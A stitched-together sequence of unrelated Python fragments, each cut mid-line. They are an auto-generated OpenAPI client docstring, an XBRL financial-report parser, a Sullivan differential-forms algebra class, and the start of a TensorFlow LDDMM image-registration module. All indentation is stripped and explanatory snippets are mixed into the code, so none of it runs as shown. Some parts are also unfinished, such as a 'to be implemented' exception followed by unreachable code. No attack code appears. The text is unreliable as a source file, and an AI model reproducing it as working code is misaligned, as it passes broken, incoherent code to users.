>>> thread = api.present_proof_records_pres_ex_id_problem_report_post(pres_ex_id, async_req=True)
>>> result = thread.get()
Args:
pres_ex_id (str): Presentation exchange identifier
Keyword Args:
body (V10PresentationProblemReportRequest): [optional]
_return_http_data_only (bool): response data only, without status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
| |
from bs4 import BeautifulSoup as BS # Can parse xml or html docs
from datetime import datetime
from dateutil import parser
from src.data_processing.xbrl_pd_methods import XbrlExtraction
import pandas as pd
import os
import csv
import time
import sys
import math
import multiprocessing as mp
import numpy as np
class XbrlParser:
""" This is a class for parsing the XBRL data."""
def __init__(self):
"""
Constructs all the necessary attributes for the XbrlParser object of
which there are none.
"""
pass
# Table of variables and values that indicate consolidated status
consolidation_var_table = {
"includedinconsolidationsubsidiary": True,
# implicit string concatenation avoids a backslash continuation, which
# would splice the next line's leading whitespace into the key
"investmententityrequiredto"
"applyexceptionfromconsolidationtruefalse": True,
"subsidiaryunconsolidatedtruefalse": False,
"descriptionreasonwhyentityhasnot"
"preparedconsolidatedfinancialstatements": "exist",
"consolidationpolicy": "exist"
}
@staticmethod
def clean_value(string):
"""
Take a value that is stored as a string, clean it and convert to
numeric. If it's just a dash, it is taken to mean zero.
Arguments:
string: string to be cleaned and converted (str)
Returns:
string: cleaned string converted to numeric (float), or the
original string if it cannot be converted
Raises:
None
"""
if string.strip() == "-":
return 0.0
try:
return float(string.strip().replace(",", "").replace(" ", ""))
except:
pass
return string
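A standalone copy of the cleaning logic above, for illustration of the three cases (lone dash, numeric with separators, non-numeric passthrough):

```python
# Mirrors XbrlParser.clean_value: a lone dash means zero, thousands
# separators and spaces are stripped before conversion, and anything
# non-numeric is returned unchanged.
def clean_value(string):
    if string.strip() == "-":
        return 0.0
    try:
        return float(string.strip().replace(",", "").replace(" ", ""))
    except ValueError:
        return string

print(clean_value(" 1,234,567 "))  # 1234567.0
print(clean_value("-"))            # 0.0
print(clean_value("n/a"))          # n/a
```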
@staticmethod
def retrieve_from_context(soup, contextref):
"""
Used where an element of the document contained no data, only a
reference to a context element.
Finds the relevant context element and retrieves the relevant data.
Arguments:
soup: BeautifulSoup souped html/xml object (BeautifulSoup object)
contextref: id of the context element to be raided
Returns:
contents: relevant data from the context (string)
"""
try:
context = soup.find("xbrli:context", id=contextref)
contents = context.find("xbrldi:explicitmember").get_text()\
.split(":")[-1].strip()
except:
contents = ""
return contents
@staticmethod
def retrieve_accounting_standard(soup):
"""
Gets the accounting standard in use in a document by hunting
down the link to the schema reference sheet that always appears to
be in the document, and extracting the format and standard date from
the string of the url itself.
WARNING - That means that there's a lot of implicit hardcoded info
on the way these links are formatted and referenced within this
function. Might need changing someday.
Arguments:
soup: BeautifulSoup souped html/xml object (BeautifulSoup object)
Returns:
standard: The standard for the object (string)
date: The date for the object (string)
original_url: The original url of the object (string)
Raises:
None
"""
# Find the relevant link by its unique attribute
link_obj = soup.find("link:schemaref")
# If we didn't find anything it's an xml doc using a different
# element name:
if link_obj == None:
link_obj = soup.find("schemaref")
# extract the name of the .xsd schema file, which contains format
# and date information
text = link_obj['xlink:href'].split("/")[-1].split(".")[0]
# Split the extracted text into format and date, return values
standard, date, original_url = \
text[:-10].strip("-"), text[-10:], link_obj['xlink:href']
return standard, date, original_url
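A worked example of the slicing above, using a hypothetical schema href shaped the way the function assumes (format name and ISO date joined by dashes in the final path segment):

```python
# The final path segment is split off the extension, then the last ten
# characters are the date and the rest (minus joining dashes) the format.
href = "https://example.org/FRS-102/2014-09-01/FRS-102-2014-09-01.xsd"
text = href.split("/")[-1].split(".")[0]   # 'FRS-102-2014-09-01'
standard = text[:-10].strip("-")           # 'FRS-102'
date = text[-10:]                          # '2014-09-01'
print(standard, date)                      # FRS-102 2014-09-01
```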
@staticmethod
def retrieve_unit(soup, each):
"""
Gets the reporting unit by trying to chase a unitref to
its source, alternatively uses element attribute unitref
if it's not a reference to another element.
Arguments:
soup: BeautifulSoup souped html/xml object (BeautifulSoup object)
each: element of BeautifulSoup souped object
Returns:
unit_str: the unit of the element (string)
Raises:
None
"""
# If not, try to discover the unit string in the soup object
try:
unit_str = soup.find(id=each['unitref']).get_text()
except:
# Or if not, in the attributes of the element
try:
unit_str = each.attrs['unitref']
except:
return "NA"
return unit_str.strip()
@staticmethod
def retrieve_date(soup, each):
"""
Gets the reporting date by trying to chase a contextref
to its source and extract its period, alternatively uses
element attribute contextref if it's not a reference
to another element.
Arguments:
soup: BeautifulSoup souped html/xml object (BeautifulSoup object)
each: element of BeautifulSoup souped object
Returns:
date_val: The reporting date of the object (date)
Raises:
None
"""
# Try to find a date tag within the contextref element, starting with
# the most specific tags, and starting with those for ixbrl docs as
# it's the most common file.
date_tag_list = ["xbrli:enddate",
"xbrli:instant",
"xbrli:period",
"enddate",
"instant",
"period"]
for tag in date_tag_list:
try:
date_str = each['contextref']
date_val = parser.parse(soup.find(id=each['contextref']).
find(tag).get_text()).date()\
.isoformat()
return date_val
except:
pass
try:
date_str = each.attrs['contextref']
date_val = parser.parse(each.attrs['contextref']).date().\
isoformat()
return date_val
except:
pass
return "NA"
@staticmethod
def parse_element(soup, element):
"""
For a discovered XBRL tagged element, go through, retrieve its name
and value and associated metadata.
Arguments:
soup: BeautifulSoup object of accounts document (BeautifulSoup object)
element: soup object of discovered tagged element
Returns:
element_dict: A dictionary containing the elements name value and
metadata (dict)
Raises:
None
"""
if "contextref" not in element.attrs:
return {}
element_dict = {}
# Basic name and value
try:
# Method for XBRLi docs first
element_dict['name'] = element.attrs['name'].lower().split(":")[-1]
except:
# Method for XBRL docs second
element_dict['name'] = element.name.lower().split(":")[-1]
element_dict['value'] = element.get_text()
element_dict['unit'] = XbrlParser.retrieve_unit(soup, element)
element_dict['date'] = XbrlParser.retrieve_date(soup, element)
# If there's no value retrieved, try raiding the associated context
# data
if element_dict['value'] == "":
element_dict['value'] = XbrlParser.retrieve_from_context(
soup, element.attrs['contextref'])
# If the value has a defined unit (eg a currency) convert to numeric
if element_dict['unit'] != "NA":
element_dict['value'] = XbrlParser.clean_value(
element_dict['value'])
# Retrieve sign of element if exists
try:
element_dict['sign'] = element.attrs['sign']
# if it's negative, convert the value then and there
if element_dict['sign'].strip() == "-":
element_dict['value'] = 0.0 - element_dict['value']
except:
pass
return element_dict
@staticmethod
def parse_elements(element_set, soup):
"""
For a set of discovered elements within a document, try to parse
them. Only keep valid results (test is whether field "name" exists).
Arguments:
element_set: BeautifulSoup iterable search result object (list of BeautifulSoup objects)
soup: BeautifulSoup object of accounts document (BeautifulSoup object)
Returns:
elements: A list of dicts corresponding to the elements of
element_set (list)
Raises:
None
"""
element_dict = {'name': [], 'value': [], 'unit': [],
'date': [], 'sign': []}
for element in element_set:
if "contextref" not in element.attrs:
# skip this element rather than discarding the whole batch
continue
# Basic name and value
try:
# Method for XBRLi docs first
element_dict['name'].append(element.attrs['name'].lower().split(":")[-1])
except:
# Method for XBRL docs second
element_dict['name'].append(element.name.lower().split(":")[-1])
element_dict['value'].append(element.get_text())
element_dict['unit'].append(XbrlParser.retrieve_unit(soup, element))
element_dict['date'].append(XbrlParser.retrieve_date(soup, element))
# If there's no value retrieved, try raiding the associated context
# data
if element_dict['value'][-1] == "":
element_dict['value'][-1] = XbrlParser.retrieve_from_context(
soup, element.attrs['contextref'])
# If the value has a defined unit (eg a currency) convert to numeric
if element_dict['unit'][-1] != "NA":
element_dict['value'][-1] = XbrlParser.clean_value(
element_dict['value'][-1])
# Retrieve sign of element if it exists; default to "" so the lists
# stay aligned with one entry per element
element_dict['sign'].append(element.attrs.get('sign', ''))
# if it's negative, convert the value then and there
if element_dict['sign'][-1].strip() == "-":
element_dict['value'][-1] = 0.0 - element_dict['value'][-1]
return element_dict
@staticmethod
def summarise_by_sum(doc, variable_names):
"""
Takes a document (dict) after extraction, and tries to extract
a summary variable relating to the financial state of the enterprise
by summing all those named that exist.
Arguments:
doc: an extracted document dict, with "elements" entry
as created by the 'scrape_clean_elements' functions
(dict)
variable_names: variables to find and sum (all that exist)
Returns (as a dict):
total_assets: the totals of the given values
units: the units corresponding to the given sum
"""
# Convert elements to pandas df
df = pd.DataFrame(doc['elements'])
# Subset to most recent (latest dated)
df = df[df['date'] == doc['doc_balancesheetdate']]
total_assets = 0.0
unit = "NA"
# Find the total assets by summing components
for each in variable_names:
# Fault-tolerant, will skip whatever isn't numeric
try:
total_assets = total_assets + df[df['name'] == each]\
.iloc[0]['value']
# Retrieve reporting unit if exists
unit = df[df['name'] == each].iloc[0]['unit']
except:
pass
return {"total_assets": total_assets, "unit": unit}
@staticmethod
def summarise_by_priority(doc, variable_names):
"""
Takes a document (dict) after extraction, and tries to extract
a summary variable relating to the financial state of the enterprise
by looking for each named, in order.
Arguments:
doc: an extracted document dict, with "elements" entry
as created by the 'scrape_clean_elements' functions
(dict)
variable_names: variables to find and check if they exist
Returns (as a dict):
primary_assets: total assets from given variables
unit: units for corresponding assets
Raises:
None
"""
# Convert elements to pandas df
df = pd.DataFrame(doc['elements'])
# Subset to most recent (latest dated)
df = df[df['date'] == doc['doc_balancesheetdate']]
primary_assets = 0.0
unit = "NA"
# Find the net asset/liability variable by hunting names in order
for each in variable_names:
try:
# | |
i in m.split('|')]
# zero polynomial on restriction
if len([i for i, e in enumerate(split_m) \
if e > 0 and i not in f]) > 0:
continue
out_m = [e for i, e in enumerate(split_m) if i in f]
out_m = '|'.join([str(i) for i in out_m])
out_p[out_m] = c
# map dt to range of f
out_form['|'.join([str(f[i]) for i in split_dt])] = out_p
return SullivanForm(out_n, out_form)
raise Exception('to be implemented')
return SullivanForm(m, out_form)
def p(self):
# initialize output form as 0
out_n = self.n
out_form = duf.DupontForm(out_n, {'': 0})
# for each dt, we integrate and add the result to the output form
for dt, p in self.form.items():
# in case there is no dt (ie: just a polynomial): evaluation at
# the vertices
if dt == '':
aux_duf = [duf.DupontForm(out_n, {'': 0})]
for m, c in p.items():
split_m = [int(e) for e in m.split('|')]
# loop through vertices of the simplex
n_nonzero, v_nonzero = 0, -1
for v, e in enumerate(split_m):
if e > 0:
n_nonzero += 1
v_nonzero = v
# if more than one are non-zero, then we get zero
if n_nonzero > 1:
continue
elif n_nonzero == 0:
aux_duf.append(
duf.DupontForm(
out_n,
{'': c}
)
)
else:
aux_duf.append(
duf.DupontForm(
out_n,
{str(v_nonzero): c}
)
)
aux_duf = sum(aux_duf)
out_form += aux_duf
# otherwise, for proper forms
else:
aux_duf = [duf.DupontForm(out_n, {'': 0})]
split_dt = [int(i) for i in dt.split('|')]
# we consider all the sub-simplices of the dimension on which dt
# could integrate to something non-zero
for f in it.combinations(range(out_n+1), len(split_dt) + 1):
# dt needs to cover all coordinates except one
if len([i for i in f if i not in split_dt]) != 1:
continue
# f as map from image to range
f = {j: i for i, j in enumerate(f)}
# pullback form
pbf = SullivanForm(out_n, {dt: p}).pullback(f)
# skip if pullback is zero
if pbf.is_zero:
continue
# integrate the polynomial
int_poly = 0
# pullback of dt
pb_dt = '|'.join([str(f[i]) for i in split_dt])
sign = [(-1)**i for i in range(pbf.n + 1) \
if i not in [f[j] for j in split_dt]][0]
for m, c in pbf.form[pb_dt].items():
split_m = [int(e) for e in m.split('|')]
int_poly += sign * c * \
np.prod([math.factorial(e) for e in split_m])/ \
math.factorial(sum(split_m) + pbf.n)
# add resulting form
aux_duf.append(
duf.DupontForm(
out_n,
{'|'.join([str(i) for i in f]): int_poly}
)
)
aux_duf = sum(aux_duf)
out_form += aux_duf
return out_form
def d(self):
"""
Differential.
"""
out_n = self.n
out_form = SullivanForm.zero(out_n)
for dt, p in self.form.items():
for m, c in p.items():
# d(monomial)
split_m = [int(e) for e in m.split('|')]
for i, e in enumerate(split_m):
if e == 0:
continue
aux_split_m = [*split_m]
aux_split_m[i] -= 1
aux_m = '|'.join([str(x) for x in aux_split_m])
aux_c = c * e
if dt == '':
aux_dt = str(i)
else:
aux_dt = f"{i}|{dt}"
# add term to final form
out_form += SullivanForm(
out_n,
{aux_dt: {aux_m: aux_c}}
)
return out_form
def apply_permutation(self, permutation):
"""
Action of permutation on a form (mapping t_i to t_permutation(i)).
Permutation given as a dictionary; it can be partial, in which case it
is automatically completed with the identity on all missing values.
Eg: {1: 2, 2: 1} is the transposition (1 2).
Parameters
----------
permutation : dict
Permutation to apply.
Returns
-------
SullivanForm
Permuted form.
"""
# complete permutation
for i in range(self.n + 1):
if i not in permutation:
permutation[i] = i
# inverse permutation
permutation_inv = {j: i for i, j in permutation.items()}
out_n = self.n
out_form = {}
for dt, p in self.form.items():
# permute dt
if dt == '':
dt_split = []
else:
dt_split = [int(i) for i in dt.split('|')]
aux_dt = [str(permutation[i]) for i in dt_split]
aux_dt = '|'.join(aux_dt)
aux_p = {}
for m, c in p.items():
# permute t
m_split = [int(e) for e in m.split('|')]
aux_m = [str(m_split[permutation_inv[i]]) \
for i in range(out_n + 1)]
aux_m = '|'.join(aux_m)
aux_p[aux_m] = c
out_form[aux_dt] = aux_p
return SullivanForm(out_n, out_form)
def reduce(self, eliminate=0):
"""
Simplify the form by eliminating all occurrences of t_[eliminate].
Parameters
----------
eliminate : int, optional
The t to eliminate from the expression. The default is 0.
Returns
-------
SullivanForm
Simplified form.
"""
out_n = self.n
# first reduce the dt
temp_form = SullivanForm.zero(out_n)
for dt, p in self.form.items():
if dt == '':
dt_split = []
else:
dt_split = [int(i) for i in dt.split('|')]
if eliminate not in dt_split:
temp_form += SullivanForm(out_n, {dt: p})
else:
i_elim = dt_split.index(eliminate)
aux_form = {}
for i in range(out_n + 1):
if i in dt_split: # either eliminate or already occurring
continue
aux_dt = [*dt_split]
aux_dt[i_elim] = i
aux_dt = '|'.join([str(j) for j in aux_dt])
aux_form[aux_dt] = p
# notice the minus sign
aux_form = -SullivanForm(out_n, aux_form)
temp_form += aux_form
# then reduce the polynomials
# probably not optimal, but the easiest and clearest way of
# implementing it
# t_eliminate = 1 - t_0 - ... - t_n (only t_eliminate does not appear
# on the right-hand side)
replacement_poly = {
'|'.join([str(int(j == i)) for j in range(out_n + 1)]): -1 \
for i in range(out_n + 1) if i != eliminate
}
replacement_poly['|'.join(['0']*(out_n + 1))] = 1
replacement_poly = SullivanForm(out_n, {'': replacement_poly})
# replace occurrences of t_eliminate with the replacement polynomial
out_form = SullivanForm.zero(out_n)
for dt, p in temp_form.form.items():
for m, c in p.items():
m_split = [int(e) for e in m.split('|')]
# exponent of t_eliminate
exponent_elim = m_split[eliminate]
if exponent_elim == 0:
out_form += SullivanForm(out_n, {dt: {m: c}})
else:
aux_m = m_split
aux_m[eliminate] = 0
aux_m = '|'.join([str(i) for i in aux_m])
aux_form = SullivanForm(out_n, {dt: {aux_m: c}})
for _ in range(exponent_elim):
aux_form *= replacement_poly
out_form += aux_form
return out_form
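A quick numeric sanity check of the identity `reduce` relies on: on the standard simplex t_0 + t_1 + ... + t_n = 1, so any power of the eliminated coordinate expands into a polynomial in the remaining ones.

```python
# For n = 2, eliminate = 0: t_0^2 = (1 - t_1 - t_2)^2, which reduce
# rewrites as a polynomial with no occurrence of t_0.
def t0_squared(t1, t2):
    return (1 - t1 - t2) ** 2

def t0_squared_expanded(t1, t2):
    # expansion of (1 - t1 - t2)^2
    return 1 - 2*t1 - 2*t2 + t1**2 + 2*t1*t2 + t2**2

for t1, t2 in [(0.2, 0.3), (0.0, 0.5), (0.25, 0.25)]:
    assert abs(t0_squared(t1, t2) - t0_squared_expanded(t1, t2)) < 1e-12
```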
def __eq__(self, other):
"""
Check for equality of Sullivan forms. We use the fact that by reducing
away t_0 we get a representation in the commutative algebra
Q[t_1,...,t_n,dt_1,...,dt_n] and thus we need only compare coefficients.
Warning: this applies reduce() to both self and other.
"""
self = self.reduce()
other = other.reduce()
for dt, p in self.form.items():
if dt not in other.form:
return False
for m, c in p.items():
if m not in other.form[dt] or c != other.form[dt][m]:
return False
for dt, p in other.form.items():
if dt not in self.form:
return False
for m, c in p.items():
if m not in self.form[dt] or c != self.form[dt][m]:
return False
return True
def hj(self, j):
"""
Implement the auxiliary function h_j (Lunardon, p.7) which will then
be used for the contraction.
Parameters
----------
j : int
Index of the coordinate with respect to which the contraction is taken.
Returns
-------
SullivanForm.
"""
if j != 0:
# reduce to the case j = 0
out_form = self.apply_permutation({0: j, j: 0})
out_form = out_form.hj(0)
return out_form.apply_permutation({0: j, j: 0})
# case j = 0
out_n = self.n
# first eliminate t_0 from the expression
aux_form = self.reduce()
# there is an easy formula for a form written as
# x1^k1...xn^kn dt_c1 dt_c2 ... dt_cm with 1 < c1 < c2 < ... < cm,
# see Lunardon, p. 12
out_form = SullivanForm.zero(out_n)
for dt, p in aux_form.form.items():
if dt == '':
# in this case we get 0 for the monomial
continue
else:
dt_split = [int(i) for i in dt.split('|')]
for m, c in p.items():
m_split = [int(e) for e in m.split('|')]
aux_c = c / (sum(m_split) + len(dt_split))
for i, k in enumerate(dt_split):
aux_dt | |
import matplotlib.pyplot as plt
import numpy as np
from scipy.linalg import expm,logm
import tensorflow as tf
import vis
import os
import argparse
import nibabel as nib
import warnings
import scipy.interpolate as spi
'''
In this file we include several basic functions that were not present natively in tensorflow,
and we implement the algorithm for image registration with intensity transformation and missing data.
The basic functions implemented are:
interp3: trilinear interpolation for deforming images and vector fields
grad3: computes the 3D gradient of a function
down: downsamples images by averaging over a rectangular neighborhood
down2: a faster downsampling version for downsampling by 2
upsample: upsample data by zero padding in the Fourier domain. This is necessary for upsampling
lddmm velocity fields without changing the regularization energy.
transform_data: applies the calculated deformation fields to image data
affine_transform_data: applies an affine transformation to data with a simpler interface
orientation_to_matrix: computes transformation matrices that relate images of different orientations.
For example 'LAS' denotes Left-Anterior-Superior, which means the first image axis
contains data from right to left, the second from posterior to anterior,
and the third from inferior to superior.
Next, the lddmm algorithm is implemented in two parts in the function 'lddmm'.
In the first part a tensorflow computation graph is defined that applies
an existing deformation to images and calculates a cost function gradient.
In the second part, these calculations are performed on data and optimization is carried out.
Finally, a basic command line interface is implemented.
'''
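As a one-dimensional sketch of the floor/fraction logic that `interp3` uses below (the `interp1` helper is illustrative only, not part of this module):

```python
import numpy as np

def interp1(x, I, phi):
    # convert sample locations to fractional grid indices
    dx = x[1] - x[0]
    idx = (phi - x[0]) / dx
    i0 = np.floor(idx).astype(int)
    p = idx - i0                      # weight of the right neighbour
    i0 = np.clip(i0, 0, len(x) - 2)  # boundary condition
    # blend the two neighbouring samples
    return I[i0] * (1 - p) + I[i0 + 1] * p

x = np.array([0.0, 1.0, 2.0, 3.0])
I = np.array([0.0, 10.0, 20.0, 30.0])
print(interp1(x, I, np.array([0.5, 1.25])))  # values 5.0 and 12.5
```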
dtype = tf.float32
idtype = tf.int64
def interp3(x0,x1,x2,I,phi0,phi1,phi2,method=1,image_dtype=dtype):
'''
Linear interpolation
Interpolate a 3D tensorflow image I
with voxels corresponding to locations in x0, x1, x2 (1d np arrays)
at the points phi0, phi1, phi2 (3d arrays)
Note optional method:
0 for nearest neighbor,
1 for trilinear (default)
Note optional dtype:
you may want to set it to idtype when doing nearest interpolation for label images
Output is the image I transformed by interpolation.
'''
if method != 0 and method != 1:
raise ValueError('method must be 0 (nearest neighbor) or 1 (trilinear)')
I = tf.convert_to_tensor(I, dtype=image_dtype)
phi0 = tf.convert_to_tensor(phi0, dtype=dtype)
phi1 = tf.convert_to_tensor(phi1, dtype=dtype)
phi2 = tf.convert_to_tensor(phi2, dtype=dtype)
# get the size
dx = [x0[1]-x0[0], x1[1]-x1[0], x2[1]-x2[0]]
nx = [len(x0), len(x1), len(x2)]
shape = tf.shape(phi0)
nxout = [shape[0],shape[1],shape[2]]
#convert to index
phi0_index = (phi0 - x0[0])/dx[0]
phi1_index = (phi1 - x1[0])/dx[1]
phi2_index = (phi2 - x2[0])/dx[2]
if method == 0: # simple hack for nearest neighbor, weights should all be binary now
phi0_index = tf.round(phi0_index)
phi1_index = tf.round(phi1_index)
phi2_index = tf.round(phi2_index)
# take the floor to get integers
phi0_index_floor = tf.floor(phi0_index)
phi1_index_floor = tf.floor(phi1_index)
phi2_index_floor = tf.floor(phi2_index)
# get the fraction to the next pixel
phi0_p = phi0_index - phi0_index_floor
phi1_p = phi1_index - phi1_index_floor
phi2_p = phi2_index - phi2_index_floor
# now convert to int and work with ints, otherwise I ended up with loss of precision
phi0_index_floor = tf.cast(phi0_index_floor,dtype=idtype)
phi1_index_floor = tf.cast(phi1_index_floor,dtype=idtype)
phi2_index_floor = tf.cast(phi2_index_floor,dtype=idtype)
# get the next samples
phi0_index_floor_1 = phi0_index_floor+1
phi1_index_floor_1 = phi1_index_floor+1
phi2_index_floor_1 = phi2_index_floor+1
# and apply boundary conditions
phi0_index_floor = tf.minimum(phi0_index_floor,nx[0]-1)
phi0_index_floor = tf.maximum(phi0_index_floor,0)
phi0_index_floor_1 = tf.minimum(phi0_index_floor_1,nx[0]-1)
phi0_index_floor_1 = tf.maximum(phi0_index_floor_1,0)
phi1_index_floor = tf.minimum(phi1_index_floor,nx[1]-1)
phi1_index_floor = tf.maximum(phi1_index_floor,0)
phi1_index_floor_1 = tf.minimum(phi1_index_floor_1,nx[1]-1)
phi1_index_floor_1 = tf.maximum(phi1_index_floor_1,0)
phi2_index_floor = tf.minimum(phi2_index_floor,nx[2]-1)
phi2_index_floor = tf.maximum(phi2_index_floor,0)
phi2_index_floor_1 = tf.minimum(phi2_index_floor_1,nx[2]-1)
phi2_index_floor_1 = tf.maximum(phi2_index_floor_1,0)
# if I wanted to apply zero boundary conditions, I'd have to check here where they are
# then set to zero below
# at this point it should be impossible for any of my indices to point outside the volume
# then we will need to vectorize everything to use scalar indices
phi0_index_floor_flat = tf.reshape(phi0_index_floor,[-1])
phi0_index_floor_flat_1 = tf.reshape(phi0_index_floor_1,[-1])
phi1_index_floor_flat = tf.reshape(phi1_index_floor,[-1])
phi1_index_floor_flat_1 = tf.reshape(phi1_index_floor_1,[-1])
phi2_index_floor_flat = tf.reshape(phi2_index_floor,[-1])
phi2_index_floor_flat_1 = tf.reshape(phi2_index_floor_1,[-1])
I_flat = tf.reshape(I,[-1])
# indices recall that the LAST INDEX IS CONTIGUOUS
phi_index_floor_flat_000 = nx[2]*nx[1]*phi0_index_floor_flat + nx[2]*phi1_index_floor_flat + phi2_index_floor_flat
phi_index_floor_flat_001 = nx[2]*nx[1]*phi0_index_floor_flat + nx[2]*phi1_index_floor_flat + phi2_index_floor_flat_1
phi_index_floor_flat_010 = nx[2]*nx[1]*phi0_index_floor_flat + nx[2]*phi1_index_floor_flat_1 + phi2_index_floor_flat
phi_index_floor_flat_011 = nx[2]*nx[1]*phi0_index_floor_flat + nx[2]*phi1_index_floor_flat_1 + phi2_index_floor_flat_1
phi_index_floor_flat_100 = nx[2]*nx[1]*phi0_index_floor_flat_1 + nx[2]*phi1_index_floor_flat + phi2_index_floor_flat
phi_index_floor_flat_101 = nx[2]*nx[1]*phi0_index_floor_flat_1 + nx[2]*phi1_index_floor_flat + phi2_index_floor_flat_1
phi_index_floor_flat_110 = nx[2]*nx[1]*phi0_index_floor_flat_1 + nx[2]*phi1_index_floor_flat_1 + phi2_index_floor_flat
phi_index_floor_flat_111 = nx[2]*nx[1]*phi0_index_floor_flat_1 + nx[2]*phi1_index_floor_flat_1 + phi2_index_floor_flat_1
# now slice the image
I000_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_000, dtype=idtype))
I001_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_001, dtype=idtype))
I010_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_010, dtype=idtype))
I011_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_011, dtype=idtype))
I100_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_100, dtype=idtype))
I101_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_101, dtype=idtype))
I110_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_110, dtype=idtype))
I111_flat = tf.gather(I_flat, tf.cast(phi_index_floor_flat_111, dtype=idtype))
# reshape it
I000 = tf.reshape(I000_flat, nxout)
I001 = tf.reshape(I001_flat, nxout)
I010 = tf.reshape(I010_flat, nxout)
I011 = tf.reshape(I011_flat, nxout)
I100 = tf.reshape(I100_flat, nxout)
I101 = tf.reshape(I101_flat, nxout)
I110 = tf.reshape(I110_flat, nxout)
I111 = tf.reshape(I111_flat, nxout)
# combine them
p000 = tf.cast((1.0-phi0_p)*(1.0-phi1_p)*(1.0-phi2_p), dtype=image_dtype)
p001 = tf.cast((1.0-phi0_p)*(1.0-phi1_p)*( phi2_p), dtype=image_dtype)
p010 = tf.cast((1.0-phi0_p)*( phi1_p)*(1.0-phi2_p), dtype=image_dtype)
p011 = tf.cast((1.0-phi0_p)*( phi1_p)*( phi2_p), dtype=image_dtype)
p100 = tf.cast(( phi0_p)*(1.0-phi1_p)*(1.0-phi2_p), dtype=image_dtype)
p101 = tf.cast(( phi0_p)*(1.0-phi1_p)*( phi2_p), dtype=image_dtype)
p110 = tf.cast(( phi0_p)*( phi1_p)*(1.0-phi2_p), dtype=image_dtype)
p111 = tf.cast(( phi0_p)*( phi1_p)*( phi2_p), dtype=image_dtype)
Il = I000*p000\
+ I001*p001\
+ I010*p010\
+ I011*p011\
+ I100*p100\
+ I101*p101\
+ I110*p110\
+ I111*p111
return Il
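Two invariants of interp3 are worth checking in isolation: the C-order flat-index arithmetic (last index contiguous) and the fact that the eight trilinear corner weights always sum to one. This pure-Python sketch is illustrative only; `flat_index` is a hypothetical helper, not part of the module.

```python
def flat_index(i, j, k, nx):
    # C-order (row-major) flattening: the last index varies fastest
    return nx[2] * nx[1] * i + nx[2] * j + k

# build a 2x3x4 volume as a flat list and check a lookup
nx = [2, 3, 4]
volume = [(i, j, k) for i in range(nx[0]) for j in range(nx[1]) for k in range(nx[2])]
assert volume[flat_index(1, 2, 3, nx)] == (1, 2, 3)

# the eight trilinear weights sum to 1 for any fractional offsets,
# since they factor as (p0 + (1-p0)) * (p1 + (1-p1)) * (p2 + (1-p2))
p0, p1, p2 = 0.3, 0.6, 0.9
weights = [(p0 if b0 else 1 - p0) * (p1 if b1 else 1 - p1) * (p2 if b2 else 1 - p2)
           for b0 in (0, 1) for b1 in (0, 1) for b2 in (0, 1)]
assert abs(sum(weights) - 1.0) < 1e-12
```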
def grad3(I,dx):
'''
    Calculate the gradient of a 3D image
    Inputs are I, a 3D image
    and dx, a 3-tuple of voxel dimensions
Outputs are each component of the gradient returned as a tuple
'''
I_0_m = (I[1,:,:] - I[0,:,:])/dx[0]
I_0_p = (I[-1,:,:] - I[-2,:,:])/dx[0]
I_0_0 = (I[2:,:,:]-I[:-2,:,:])/2.0/dx[0]
I_0 = tf.concat([I_0_m[None,:,:], I_0_0, I_0_p[None,:,:]], axis=0)
I_1_m = (I[:,1,:] - I[:,0,:])/dx[1]
I_1_p = (I[:,-1,:] - I[:,-2,:])/dx[1]
I_1_0 = (I[:,2:,:]-I[:,:-2,:])/2.0/dx[1]
I_1 = tf.concat([I_1_m[:,None,:], I_1_0, I_1_p[:,None,:]], axis=1)
I_2_m = (I[:,:,1] - I[:,:,0])/dx[2]
I_2_p = (I[:,:,-1] - I[:,:,-2])/dx[2]
I_2_0 = (I[:,:,2:]-I[:,:,:-2])/2.0/dx[2]
I_2 = tf.concat([I_2_m[:,:,None], I_2_0, I_2_p[:,:,None]], axis=2)
return I_0, I_1, I_2
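grad3 uses one-sided differences at the boundaries and central differences in the interior. The same scheme in 1D with plain lists (`grad1` is a hypothetical helper for illustration):

```python
def grad1(f, dx):
    '''One-sided differences at the two ends, central differences inside.'''
    n = len(f)
    g = [0.0] * n
    g[0] = (f[1] - f[0]) / dx                      # forward difference
    g[-1] = (f[-1] - f[-2]) / dx                   # backward difference
    for i in range(1, n - 1):
        g[i] = (f[i + 1] - f[i - 1]) / (2.0 * dx)  # central difference
    return g

# the scheme is exact for linear signals
f = [2.0 * i for i in range(5)]
assert grad1(f, 1.0) == [2.0] * 5
```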
def down(I,ndown):
'''Downsample images by averaging over a rectangular neighborhood
Inputs are a 3D image I
a downsampling factor on each axis ndown = [ndown0,ndown1,ndown2]
Output is the downsampled image.
'''
ndown = np.array(ndown)
n0 = np.array(I.shape)
n1 = np.array(n0)//ndown
J = np.zeros(n1)
factor = 1.0 / np.prod(ndown)
for i in range(ndown[0]):
for j in range(ndown[1]):
for k in range(ndown[2]):
J += I[i:n1[0]*ndown[0]:ndown[0],j:n1[1]*ndown[1]:ndown[1],k:n1[2]*ndown[2]:ndown[2]] * factor
return J
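The strided-accumulation trick used by down (loop over offsets within the window, add a strided slice each time) can be sketched in 1D; `down1` is a hypothetical helper, not part of the module:

```python
def down1(x, ndown):
    '''Average non-overlapping windows of length ndown; trailing samples that
    do not fill a whole window are dropped, as in the 3D version.'''
    n1 = len(x) // ndown
    out = [0.0] * n1
    for offset in range(ndown):          # one pass per in-window offset
        for b in range(n1):
            out[b] += x[b * ndown + offset] / ndown
    return out

assert down1([1.0, 3.0, 5.0, 7.0, 9.0], 2) == [2.0, 6.0]  # the 9.0 is dropped
```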
def down2(I):
'''Downsample by a factor of 2 by averaging over a 2x2x2 neighborhood
Input is an image I
Output is the downsampled image
'''
n0 = np.array(I.shape)
n1 = n0//2
J = np.zeros(n1)
for i in range(2):
for j in range(2):
for k in range(2):
